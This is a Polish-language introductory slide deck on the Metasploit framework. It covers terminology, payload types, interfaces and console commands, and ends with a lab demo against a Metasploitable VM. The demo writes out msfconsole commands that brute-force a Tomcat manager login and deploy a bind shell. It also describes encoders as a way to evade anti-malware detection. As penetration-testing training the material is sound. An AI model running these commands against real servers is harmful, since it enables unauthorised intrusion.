Metasploit Part 1 - WordPress.com · 2011-06-08 · Metasploit zostal przygotowany w 2003 roku w...

Preview:

Citation preview

Metasploit Part 1

The Beginning

Agenda • Co to jest Metasploit? • Historiia • Terminologia • Rodzaje Payload’ów • Opisy modułów • Podstawy Konsoli

Metasploit... czyli? • Framework do pentestów • Napisany w Ruby • Zawiera w sobie: Exploity, Payloads, Auxiliaries,

Automation Tools, i wiele innych...

• Wieloplatformowy • Wsparcie Developerów • Możliwośd pisania własnych wtyczek • OpenSource weeeee... :]

„A little bit about this shit” Metasploit zostal przygotowany w 2003 roku w jezyku Perl. Od wersji 3.0 zostal calkowicie przepisany w jezyku Ruby. Srodowisko moze byc uruchamiane na wielu wersjach systemu Unix i Linux oraz w systemie Windows. W pazdzierniku 2009 projekt Metasploit zostal przejety przez firme Rapid 7 specjalizujaca sie w oprogramowaniu do zarzadzania podatnosciami systemów. (WiKi)

Terminologia Exploit (eksploatowad kogoś lub coś) The vector for getting into the system, whether it be because of a vulnerability or a bad config Payload (Ładunek) What you want the exploit to do.

Encoders (Programy szyfrujące) Ways to mangle the code so anti-malware apps won’t detect the payload Auxillary (pomocniczy) Just another fun little app that comes with Metasploit (IRONGEEK)

Rodzaje PayLoad’ów - Inline All the shellcode to be executed goes with the payload. More stable, but may be too big. - Staged (pl. Stopniowanie) The payload is just a small stub that grabs the rest of the shell code after the exploit works. Smaller, and less for AV to grab a hold of.

-Reverse Instead of having to establish a connection in after an exploit works, the payload connects back you. This has a better chance of getting around firewalls with weak egress filtering. - NoNX These payloads try to work around things like DEP (Data Execution Prevention) (IRONGEEK)

Ale Metasploit to nie... Czasem schemat używania to: 1. Ustawid rodzaj exploit’a 2. Ustawid rodzaj payload’a 3. Ustawid cel naszej zabawy 4. Iśd po piwo... 5. Cieszyd się kontrolą ;] To nie wszystko co potrafi Metasploit... On potrafi wiele więcej...

Piękny Prosty Interfejs MsfConsole:

Piękny Prosty Interfejs MsfCli:

Piękny Prosty Interfejs MsfGui:

Piękny Prosty Interfejs

Piękny Prosty Interfejs MsfWEB:

A teraz zalety i wady MsfConsole: + Najlepiej wspierany interfejs frameworka + Prawie wszystkie opcje są dostępne - Nie jako "wskaż i kliknij w msggui / msfweb Msfcli + Łatwo dodad dobrodziejstwa metasploita do własnego skryptu - Nie jest tak dobrze wspierany jak msfconsole - Cięższy do użycia

A teraz zalety i wady Msfweb +Fajny Interfejs +Łatwy do zrozumienia treści +Dobry do pokazania prostych ataków -Nie jest tak dobrze wspierany jak msfconsole -Wolny Msfgui + Fajny Interfejs + Własne skórki (IRONGEEK)

Podstawy Konsoli Polecenia: help search set setg show (options/advanced/etc) exploit/run sessions –l sessions -i 1

Demo Sytuacja 1:

Hacker Serwer Ubuntu

Używane rzeczy • BackTrack w wersji 5 • Metasploit 3.7.0 • Nmap

• Metasploitable

Atak cz. 1 • Skan sieci w poszukiwaniu hosta:

$~> nmap –v –sn 192.168.10.0/24 • Skan hosta nmapem

• Atak 1

Atak cz. 1 msf > use scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable msf auxiliary(tomcat_mgr_login) > set RPORT 8180 msf auxiliary(tomcat_mgr_login) > exploit

Atak cz. 1 Rezultat: mamy login i hasło Cel: zdobyd shell ;]

Atak cz. 2 msf > use multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp msf exploit(tomcat_mgr_deploy) > exploit

Atak cz. 2 Posiadamy shella, więc możemy dalej psocid.

Metasploit Part 1

The Beginning Q&A

Metasploit Part 1

The Beginning THX ;]